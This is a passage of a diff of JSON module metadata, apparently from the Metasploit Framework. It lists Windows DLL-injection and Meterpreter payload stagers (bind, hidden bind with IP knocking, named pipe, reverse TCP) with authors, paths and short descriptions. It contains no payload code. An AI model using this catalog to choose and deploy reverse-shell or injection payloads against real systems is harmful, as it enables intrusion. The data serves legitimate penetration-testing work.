"ref_name": "windows/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/patchupdllinject/bind_hidden_ipknock_tcp": { - "name": "Windows Inject DLL, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/patchupdllinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/patchupdllinject/bind_hidden_tcp": { - "name": "Windows Inject DLL, Hidden Bind TCP Stager", - "fullname": "payload/windows/patchupdllinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/patchupdllinject/bind_ipv6_tcp": { - "name": "Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/patchupdllinject/bind_ipv6_tcp_uuid": { - "name": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/patchupdllinject/bind_named_pipe": { - "name": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/patchupdllinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "UserExistsError" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/patchupdllinject/bind_nonx_tcp": { - "name": "Windows Inject DLL, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupdllinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "vlad902 " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/patchupdllinject/bind_tcp": { - "name": "Windows Inject DLL, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/patchupdllinject/bind_tcp_rc4": { - "name": "Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupdllinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/patchupdllinject/bind_tcp_uuid": { - "name": "Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupdllinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/patchupdllinject/find_tag": { - "name": "Windows Inject DLL, Find Tag Ordinal Stager", - "fullname": "payload/windows/patchupdllinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape " - ], - "description": "Inject a custom DLL into the exploited process.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/patchupdllinject/reverse_ipv6_tcp": { - "name": "Windows Inject DLL, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/patchupdllinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/patchupdllinject/reverse_nonx_tcp": { - "name": "Windows Inject DLL, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupdllinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "vlad902 " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/patchupdllinject/reverse_ord_tcp": { - "name": "Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupdllinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "spoonm " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/patchupdllinject/reverse_tcp": { - "name": "Windows Inject DLL, Reverse TCP Stager", - "fullname": "payload/windows/patchupdllinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/patchupdllinject/reverse_tcp_allports": { - "name": "Windows Inject DLL, Reverse All-Port TCP Stager", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf " - ], - "description": "Inject a custom DLL into the exploited process.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/patchupdllinject/reverse_tcp_dns": { - "name": "Windows Inject DLL, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/patchupdllinject/reverse_tcp_rc4": { - "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/patchupdllinject/reverse_tcp_rc4_dns": { - "name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/patchupdllinject/reverse_tcp_uuid": { - "name": "Windows Inject DLL, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/patchupdllinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jt ", - "skape ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupdllinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupdllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/patchupmeterpreter/bind_hidden_ipknock_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/patchupmeterpreter/bind_hidden_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager", - "fullname": "payload/windows/patchupmeterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "Borja Merino " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/patchupmeterpreter/bind_ipv6_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/patchupmeterpreter/bind_ipv6_tcp_uuid": { - "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/patchupmeterpreter/bind_named_pipe": { - "name": "Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/patchupmeterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "UserExistsError" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/patchupmeterpreter/bind_nonx_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/patchupmeterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "vlad902 " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/patchupmeterpreter/bind_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/patchupmeterpreter/bind_tcp_rc4": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/patchupmeterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/patchupmeterpreter/bind_tcp_uuid": { - "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/patchupmeterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/patchupmeterpreter/find_tag": { - "name": "Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager", - "fullname": "payload/windows/patchupmeterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/patchupmeterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/patchupmeterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/patchupmeterpreter/reverse_ipv6_tcp": { - "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/patchupmeterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "jt ", - "hdm ", - "sf " - ], - "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 